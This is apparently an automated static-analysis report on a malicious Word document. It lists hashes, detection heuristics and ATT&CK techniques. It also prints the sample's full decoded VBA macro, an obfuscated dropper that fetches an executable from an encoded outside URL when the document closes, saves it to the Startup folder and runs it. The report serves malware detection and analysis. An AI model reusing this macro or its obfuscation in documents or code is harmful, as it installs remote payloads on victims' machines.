Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f137b1a5ad7d7d06…

MALICIOUS

Office (OLE)

168.5 KB Created: 2016-06-27 14:39:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 453f85a9ee71ec9fc4b23c6545f03900 SHA-1: a9b2a3f5043dc575c53a1d9acf123b8bcf638656 SHA-256: f137b1a5ad7d7d06019571215958710fd1c03a1739825a72a9f2a117ea418c4f
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, along with a critical finding of VBA downloading and executing a file via HTTP. The macro code appears to be obfuscated but the intent is to download and run a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Downloader.00536d-6923444-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6923444-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP = CreateObject("WScript.Shell").Specialfolders(7) + NJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNP
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    JUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTV = XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set KRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIE = CreateObject("Shell.Application")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4882 bytes
SHA-256: facca2159711b1d55ca8411a1ec7d8991b3221bc38c6d6ff7c831e76c0c5375d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO(YIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZM)
VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB = 10 - 9
        DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML = ""
    For OGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHU = VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB To Len(YIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZM)
        RVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJ = Asc(Mid(YIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZM, OGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHU, VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB))

            LUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBMEKMLQYGKLPCYNOFI = RVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJ - VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB
        DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML = DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML & Chr(LUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBMEKMLQYGKLPCYNOFI)
    Next
    LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO = DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML
End Function

Private Sub Document_close()
Set KRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIE = CreateObject("Shell.Application")
Set XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY = CreateObject("microsoft.xmlhttp")
Set KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM = CreateObject("adodb.stream")
NJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNP = LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO("]SQKUQ/fyf")
RELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBME = LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO("iuuq;00xxx/wbdpnqboz/dp/{b0ijtupsz0vqebuf/fyf")

EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP = CreateObject("WScript.Shell").Specialfolders(7) + NJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNP
XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.Open "GET", RELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBME, False
XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.send
JUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTV = XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.responseBody
If XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.Status = 200 Then
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Open
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Type = 1
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Write JUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTV
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.SaveToFile EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP, 2
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Close
End If
KRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIE.Open (EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP)


End Sub

Attribute VB_Name = "NewMacros"
Sub BLUR()
'
' BLUR Macro
'
'

End Sub